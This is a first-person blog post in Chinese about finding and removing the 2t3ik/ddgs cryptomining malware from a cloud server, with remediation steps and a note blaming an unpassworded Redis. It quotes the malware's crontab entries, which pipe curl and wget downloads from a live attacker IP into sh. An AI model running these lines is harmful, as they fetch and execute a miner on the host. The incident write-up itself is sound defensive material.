金山云服务器处理2t3ik与ddgs病毒实录
今天操作公司的第二台服务器,服务器是金山云的云服务器。需要用到crontab定时任务,编写了一个命令,重启。之后再测试这条命令,然后很奇怪的是写进去的crontab一会儿不存在了,很是纳闷,难道我忘记保存了??继续操作,然后发新写入的现定时任务又没有了。这就让我产生了怀疑,难道是金山云定制的一些功能,还是权限的问题?
执行crontab -l,列出当前任务
[root@vm10-0-0-3 shell]# crontab -l
*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh
*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh
还没觉得奇怪,当我过了一会儿再刷新任务时,发现任务多了一个。
[root@vm10-0-0-3 shell]# crontab -l
*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh
*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh
*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh
一开始怀疑是云服务商的一些机制,带着疑问我就百度了这个地址是做什么的。
百度搜索截图吓到我了,居然是病毒地址。点开详细查看了一下,确认是病毒。ip地址指向的美国,百度上介绍是挖矿病毒
搜狐新闻截图另外打开了url查看了一下,都是linux操作命令。
url内容截图由于工作时间较少,还是头一回遇到次问题。赶紧解决吧
1、我先是编辑crontab -e,将上述url去掉。:wq保存。重启crontab服务:service crond restart。果然crontab列表中没再次出现自动增长的链接。
此时查看进行,发现2t3ik.p程序占用cpu率已经高达398.5%
意味着此时问题还没解决。
2、按照网上搜索网友回答,我进入到/tmp文件夹下,
[root@vm10-0-0-3 tmp]# cd /tmp/
[root@vm10-0-0-3 tmp]# rm -rf 2t3ik.p
[root@vm10-0-0-3 tmp]# rm -rf ddgs.3011
此时,执行top命令,2t3ik.p程序cpu占用率依然没有减少。
根据上图所属,pid为31484。执行"kill 31484",杀死进程。执行top命令再看
PID为15505的进程cpu占用率依然占用着。再次执行"kill 15509"。
此时的运行状态趋于正常状态。查看了服务器近期的cpu占用率统计,原来这两天cpu占用率一直高居不下。
本来以为这就好了,谁知过了五分钟执行top命令,这个进程又死灰复燃了。!!!
cpu占用率依然高居不下继续kill掉pid为16160的进程。
继续kill掉进行,有时还会以2t3ik.m出现。所以
接下来,进入/tmp文件夹,执行
cd /tmp/
rm -rf 2t3ik* //删除2t3ik文件
rm -rf ddgs*
touch 2t3ik.p //自己创建空文件
touch 2t3ik.m
touch ddgs.3011
chattr +i 2t3ik* //保护文件不被修改
chattr +i ddgs*
相当于自己创建两个文件,并且不给与修改的权限。这样存留在系统中自动创建进行会于此冲突。
重启服务器 shutdown -r now
问题就此解决。cpu占用率再没急速上升。
究其原因,有个说法是低版本的redis数据库没有设置连接密码,端口6379被扫描后入侵redis漏洞所致,获取了用户的权限。查看了服务器监控报表,确实发现是redis服务安装之后的一天cpu开始异常增长的。建议大家如果遇到此问题,检查redis,并对redis服务增设密码,或者指定ip访问。防止被扫描安装病毒程序。
下面是一些相关资讯: